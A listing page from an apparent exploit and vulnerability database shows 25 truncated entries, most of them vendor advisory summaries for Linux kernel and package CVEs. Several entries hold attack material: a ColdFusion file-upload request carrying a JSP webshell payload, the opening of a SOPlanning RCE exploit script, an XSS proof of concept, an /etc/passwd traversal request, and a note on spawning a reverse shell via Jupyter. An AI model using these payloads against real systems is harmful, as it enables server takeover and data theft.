?day POC Vulnerability Database

A POC vulnerability database containing all CVEs, POCs and ?days published across the web in recent years. It can be connected to ishack's vulnerability scanner via API; some vulnerabilities are visible to members only.

  1. Debian: CVE-2024-38587: linux -- security update Severity 4 CVSS (AV:L/AC:M/Au:N/C:P/I:P/A:P) Published 06/19/2024 Created 06/28/2024 Added 06/27/2024 Modified 06/27/2024 Description In the Linux kernel, the following vulnerability has been resolved: speakup: Fix sizeof() vs ARRAY_SIZE() bug The "buf" pointer is an array of u16 values. This code should be using ARRAY_SIZE() (which is 256) instead of sizeof() (which is 512), otherwise it can still go out of bounds. Solution(s) debian-upgrade-linux References https://attackerkb.com/topics/cve-2024-38587 CVE - 2024-38587 DLA-3840-1

    • 0 replies
    • 96 views
  2. Debian: CVE-2021-47586: linux -- security update Severity 4 CVSS (AV:L/AC:M/Au:N/C:P/I:P/A:P) Published 06/19/2024 Created 07/31/2024 Added 07/30/2024 Modified 07/30/2024 Description In the Linux kernel, the following vulnerability has been resolved: net: stmmac: dwmac-rk: fix oob read in rk_gmac_setup KASAN reports an out-of-bounds read in rk_gmac_setup on the line: while (ops->regs[i]) { This happens for most platforms since the regs flexible array member is empty, so the memory after the ops structure is being read here.It seems that mostly this happens to contain zero anyway, so we get lucky and everything still works. To avoid adding…

    • 0 replies
    • 95 views
  3. SUSE: CVE-2021-47461: SUSE Linux Security Advisory Severity 4 CVSS (AV:L/AC:M/Au:N/C:P/I:P/A:P) Published 05/22/2024 Created 08/16/2024 Added 08/09/2024 Modified 08/09/2024 Description In the Linux kernel, the following vulnerability has been resolved: userfaultfd: fix a race between writeprotect and exit_mmap() A race is possible when a process exits, its VMAs are removed by exit_mmap() and at the same time userfaultfd_writeprotect() is called. The race was detected by KASAN on a development kernel, but it appears to be possible on vanilla kernels as well. Use mmget_not_zero() to prevent the race as done in other userfaultfd operations. …

    • 0 replies
    • 94 views
  4. Rocky Linux: CVE-2024-36978: kernel (Multiple Advisories) Severity 7 CVSS (AV:L/AC:L/Au:S/C:C/I:C/A:C) Published 06/19/2024 Created 08/23/2024 Added 08/22/2024 Modified 01/28/2025 Description In the Linux kernel, the following vulnerability has been resolved: net: sched: sch_multiq: fix possible OOB write in multiq_tune() q->bands will be assigned to qopt->bands to execute subsequent code logic after kmalloc. So the old q->bands should not be used in kmalloc. Otherwise, an out-of-bounds write will occur. Solution(s) rocky-upgrade-bpftool rocky-upgrade-bpftool-debuginfo rocky-upgrade-kernel rocky-upgrade-kernel-core rocky-…

    • 0 replies
    • 93 views
  5. VMware Photon OS: CVE-2024-38428 Severity 9 CVSS (AV:N/AC:L/Au:N/C:C/I:C/A:N) Published 06/16/2024 Created 01/21/2025 Added 01/20/2025 Modified 02/04/2025 Description url.c in GNU Wget through 1.24.5 mishandles semicolons in the userinfo subcomponent of a URI, and thus there may be insecure behavior in which data that was supposed to be in the userinfo subcomponent is misinterpreted to be part of the host subcomponent. Solution(s) vmware-photon_os_update_tdnf References https://attackerkb.com/topics/cve-2024-38428 CVE - 2024-38428

    • 0 replies
    • 89 views
  6. Vulnerability description: Adobe ColdFusion has an arbitrary file upload vulnerability; through it an attacker can upload arbitrary files and take control of the server. Affected: Adobe ColdFusion. Network mapping: app=”Adobe-ColdFusion”. Reproduction: product official website; send a request that uploads an arbitrary file POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm HTTP/1.1Host: User-Agent: Go-http-client/1.1 Content-Length: 918 Content-Type: multipart/form-data; boundary=e9fb732e96144291860c4d742145cdabf98a4ec5cbe2a91aec6dc17461a0 Accept-Encoding: gzip --e9fb732e96144291860c4d742145cdabf98a4ec5cbe2a91aec6dc17461a0 Content-Disposition: form-data; name="file"; filename="b79f4282c451e975c357d9616acea7ba.jsp" Content-Type: application/octet-stream <%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLo…

    • 0 replies
    • 89 views
  7. Alma Linux: CVE-2023-52340: Moderate: kernel security, bug fix, and enhancement update (Multiple Advisories) Severity 8 CVSS (AV:N/AC:L/Au:N/C:N/I:N/A:C) Published 05/22/2024 Created 06/01/2024 Added 05/31/2024 Modified 01/28/2025 Description The IPv6 implementation in the Linux kernel before 6.3 has a net/ipv6/route.c max_size threshold that can be consumed easily, e.g., leading to a denial of service (network is unreachable errors) when IPv6 packets are sent in a loop via a raw socket. Solution(s) alma-upgrade-bpftool alma-upgrade-kernel alma-upgrade-kernel-abi-stablelists alma-upgrade-kernel-core alma-upgrade-kernel-cross-headers…

    • 0 replies
    • 88 views
  8. FreeBSD: VID-589DE937-343F-11EF-8A7B-001B217B3468 (CVE-2024-6323): Gitlab -- Vulnerabilities Severity 8 CVSS (AV:N/AC:L/Au:N/C:C/I:N/A:N) Published 06/26/2024 Created 06/28/2024 Added 06/27/2024 Modified 01/28/2025 Description Improper authorization in global search in GitLab EE affecting all versions from 16.11 prior to 16.11.5 and 17.0 prior to 17.0.3 and 17.1 prior to 17.1.1 allows an attacker leak content of a private repository in a public project. Solution(s) freebsd-upgrade-package-gitlab-ce freebsd-upgrade-package-gitlab-ee References CVE-2024-6323

    • 0 replies
    • 88 views
  9. Debian: CVE-2023-23003: linux -- security update Severity 4 CVSS (AV:L/AC:H/Au:M/C:N/I:N/A:C) Published 03/01/2023 Created 07/31/2024 Added 07/30/2024 Modified 01/28/2025 Description In the Linux kernel before 5.16, tools/perf/util/expr.c lacks a check for the hashmap__new return value. Solution(s) debian-upgrade-linux References https://attackerkb.com/topics/cve-2023-23003 CVE - 2023-23003

    • 0 replies
    • 87 views
  10. Huawei EulerOS: CVE-2021-47230: kernel security update Severity 4 CVSS (AV:L/AC:M/Au:N/C:P/I:P/A:P) Published 05/21/2024 Created 10/09/2024 Added 10/08/2024 Modified 10/08/2024 Description In the Linux kernel, the following vulnerability has been resolved: KVM: x86: Immediately reset the MMU context when the SMM flag is cleared Immediately reset the MMU context when the vCPU's SMM flag is cleared so that the SMM flag in the MMU role is always synchronized with the vCPU's flag.If RSM fails (which isn't correctly emulated), KVM will bail without calling post_leave_smm() and leave the MMU in a bad state. The bad MMU role can lead to a NULL pointer…

    • 0 replies
    • 87 views
  11. Huawei EulerOS: CVE-2024-39509: kernel security update Severity 4 CVSS (AV:L/AC:M/Au:N/C:P/I:P/A:P) Published 07/12/2024 Created 11/27/2024 Added 11/26/2024 Modified 11/26/2024 Description In the Linux kernel, the following vulnerability has been resolved: HID: core: remove unnecessary WARN_ON() in implement() Syzkaller hit a warning [1] in a call to implement() when trying to write a value into a field of smaller size in an output report. Since implement() already has a warn message printed out with the help of hid_warn() and value in question gets trimmed with: ... value &= m; ... WARN_ON may be considered superfluous. Remove it to sup…

    • 0 replies
    • 86 views
  12. Debian: CVE-2021-47594: linux -- security update Severity 5 CVSS (AV:L/AC:L/Au:S/C:N/I:N/A:C) Published 06/19/2024 Created 07/31/2024 Added 07/30/2024 Modified 01/28/2025 Description In the Linux kernel, the following vulnerability has been resolved: mptcp: never allow the PM to close a listener subflow Currently, when deleting an endpoint the netlink PM traverses all the local MPTCP sockets, regardless of their status. If an MPTCP listener socket is bound to the IP matching the delete endpoint, the listener TCP socket will be closed. That is unexpected, the PM should only affect data subflows. Additionally, syzbot was able to trigger a NULL p…

    • 0 replies
    • 86 views
  13. # Exploit Title: SOPlanning 1.52.01 (Simple Online Planning Tool) - Remote Code Execution (RCE) (Authenticated) # Date: 6th October, 2024 # Exploit Author: Ardayfio Samuel Nii Aryee # Version: 1.52.01 # Tested on: Ubuntu import argparse import requests import random import string import urllib.parse def command_shell(exploit_url): commands = input("soplaning:~$ ") encoded_command = urllib.parse.quote_plus(commands) command_res = requests.get(f"{exploit_url}?cmd={encoded_command}") if command_res.status_code == 200: print(f"{command_res.text}") return print(f"Error: An error occurred while running command: {encoded_command}") def exp…

    • 0 replies
    • 86 views
  14. Debian: CVE-2022-43441: node-sqlite3 -- security update Severity 10 CVSS (AV:N/AC:L/Au:N/C:C/I:C/A:C) Published 03/16/2023 Created 03/16/2023 Added 03/16/2023 Modified 01/28/2025 Description A code execution vulnerability exists in the Statement Bindings functionality of Ghost Foundation node-sqlite3 5.1.1. A specially-crafted Javascript file can lead to arbitrary code execution. An attacker can provide malicious input to trigger this vulnerability. Solution(s) debian-upgrade-node-sqlite3 References https://attackerkb.com/topics/cve-2022-43441 CVE - 2022-43441 DSA-5373-1

    • 0 replies
    • 85 views
  15. # Exploit Title: LightCMS 1.3.4 - 'exclusive' Stored XSS # Date: 25/02/2021 # Exploit Author: Peithon # Vendor Homepage: https://github.com/eddy8/LightCMS # Software Link: https://github.com/eddy8/LightCMS/releases/tag/v1.3.4 # Version: 1.3.4 # Tested on: latest version of Chrome, Firefox on Windows and Linux # CVE: CVE-2021-3355 An issue was discovered in LightCMS v1.3.4.(https://github.com/eddy8/LightCMS/issues/18) There is a stored-self XSS, allowing an attacker to execute HTML or JavaScript code in a vulnerable Title field to /admin/SensitiveWords. --------------------------Proof of Concept----------------------- 1. Log in to the background. 2. Navigate to System …

    • 0 replies
    • 84 views
  16. Debian: CVE-2021-47490: linux -- security update Severity 5 CVSS (AV:L/AC:L/Au:S/C:N/I:N/A:C) Published 05/22/2024 Created 07/31/2024 Added 07/30/2024 Modified 01/28/2025 Description In the Linux kernel, the following vulnerability has been resolved: drm/ttm: fix memleak in ttm_transfered_destroy We need to cleanup the fences for ghost objects as well. Bug: https://bugzilla.kernel.org/show_bug.cgi?id=214029 Bug: https://bugzilla.kernel.org/show_bug.cgi?id=214447 Solution(s) debian-upgrade-linux References https://attackerkb.com/topics/cve-2021-47490 CVE - 2021-47490

    • 0 replies
    • 83 views
  17. VMware Photon OS: CVE-2024-50010 Severity 4 CVSS (AV:L/AC:H/Au:S/C:N/I:N/A:C) Published 10/21/2024 Created 01/21/2025 Added 01/20/2025 Modified 02/04/2025 Description In the Linux kernel, the following vulnerability has been resolved: exec: don't WARN for racy path_noexec check Both i_mode and noexec checks wrapped in WARN_ON stem from an artifact of the previous implementation. They used to legitimately check for the condition, but that got moved up in two commits: 633fb6ac3980 ("exec: move S_ISREG() check earlier") 0fd338b2d2cd ("exec: move path_noexec() check earlier") Instead of being removed said checks are WARN_ON'ed instead, which has some…

    • 0 replies
    • 81 views
  18. Red Hat: CVE-2023-26767: buffer overflow in lou_logFile function at logginc.c (Multiple Advisories) Severity 8 CVSS (AV:N/AC:L/Au:N/C:N/I:N/A:C) Published 03/16/2023 Created 11/09/2023 Added 11/08/2023 Modified 01/28/2025 Description Buffer Overflow vulnerability found in Liblouis v.3.24.0 allows a remote attacker to cause a denial of service via the lou_logFile function at logginc.c endpoint. Solution(s) redhat-upgrade-liblouis redhat-upgrade-liblouis-debuginfo redhat-upgrade-liblouis-debugsource redhat-upgrade-liblouis-utils-debuginfo redhat-upgrade-python3-louis References CVE-2023-26767 RHSA-2023:6385

    • 0 replies
    • 81 views
  19. Debian: CVE-2024-43364: cacti -- security update Severity 4 CVSS (AV:L/AC:M/Au:N/C:P/I:P/A:P) Published 10/07/2024 Created 02/13/2025 Added 02/12/2025 Modified 02/12/2025 Description Cacti is an open source performance and fault management framework. The `title` parameter is not properly sanitized when saving external links in links.php . Moreover, the said title parameter is stored in the database and reflected back to user in index.php, finally leading to stored XSS. Users with the privilege to create external links can manipulate the `title` parameter in the http post request while creating external links to perform stored XSS attacks. The vulne…

    • 0 replies
    • 79 views
  20. Oracle Linux: CVE-2024-31449: ELSA-2024-10869:redis:7 security update (MODERATE) (Multiple Advisories) Severity 6 CVSS (AV:L/AC:H/Au:S/C:C/I:C/A:C) Published 10/07/2024 Created 12/10/2024 Added 12/07/2024 Modified 02/05/2025 Description Redis is an open source, in-memory database that persists on disk. An authenticated user may use a specially crafted Lua script to trigger a stack buffer overflow in the bit library, which may potentially lead to remote code execution. The problem exists in all versions of Redis with Lua scripting. This problem has been fixed in Redis versions 6.2.16, 7.2.6, and 7.4.1. Users are advised to upgrade. There are no known…

    • 0 replies
    • 79 views
  21. Oracle Linux: CVE-2023-2194: ELSA-2023-3723:kernel security and bug fix update (IMPORTANT) (Multiple Advisories) Severity 6 CVSS (AV:L/AC:L/Au:M/C:C/I:C/A:C) Published 03/16/2023 Created 07/26/2023 Added 07/25/2023 Modified 12/06/2024 Description An out-of-bounds write vulnerability was found in the Linux kernel's SLIMpro I2C device driver. The userspace "data->block[0]" variable was not capped to a number between 0-255 and was used as the size of a memcpy, possibly writing beyond the end of dma_buffer. This flaw could allow a local privileged user to crash the system or potentially achieve code execution. An out-of…

    • 0 replies
    • 79 views
  22. Oracle Linux: CVE-2024-3657: ELSA-2024-3591:389-ds-base security update (IMPORTANT) (Multiple Advisories) Severity 8 CVSS (AV:N/AC:L/Au:N/C:N/I:N/A:C) Published 05/28/2024 Created 06/06/2024 Added 06/04/2024 Modified 12/07/2024 Description A flaw was found in 389-ds-base. A specially-crafted LDAP query can potentially cause a failure on the directory server, leading to a denial of service Solution(s) oracle-linux-upgrade-389-ds-base oracle-linux-upgrade-389-ds-base-devel oracle-linux-upgrade-389-ds-base-legacy-tools oracle-linux-upgrade-389-ds-base-libs oracle-linux-upgrade-389-ds-base-snmp oracle-linux-upgrade-python3-lib389 …

    • 0 replies
    • 77 views
  23. Vulnerability description: Jupyter Notebook (previously known as IPython notebook) is an interactive notebook that supports running more than 40 programming languages. If the administrator has not configured a password for Jupyter Notebook, the result is an unauthenticated access vulnerability: a visitor can create a console in it and execute arbitrary Python code and commands. Affected: Jupyter Notebook. Network mapping: app=”Jupyter-Notebook” && body=”Terminal”. Reproduction: visit the target, click Terminal to open the command-line interface, execute commands and spawn a reverse shell.

    • 0 replies
    • 75 views
  24. Vulnerability description: MilesightVPN is software that simplifies the VPN tunnel setup process for Milesight products and lets connection status be monitored through a web server interface. It has an arbitrary file read vulnerability through which an attacker can obtain sensitive files from the server. Affected: Milesight VPN. Network mapping: “MilesightVPN”. Reproduction: login page; verify the POC GET /../etc/passwd HTTP/1.1Host: Accept: / Content-Type: application/x-www-form-urlencoded

    • 0 replies
    • 75 views
  25. Microsoft Windows: CVE-2025-21410: Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability Severity 9 CVSS (AV:N/AC:M/Au:N/C:C/I:C/A:C) Published 02/11/2025 Created 02/12/2025 Added 02/11/2025 Modified 02/11/2025 Description Microsoft Windows: CVE-2025-21410: Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability Solution(s) microsoft-windows-windows_server_2012-kb5052020 microsoft-windows-windows_server_2012_r2-kb5052042 microsoft-windows-windows_server_2016-1607-kb5052006 microsoft-windows-windows_server_2019-1809-kb5052000 microsoft-windows-windows_server_2022-21h2-kb5051…

    • 0 replies
    • 74 views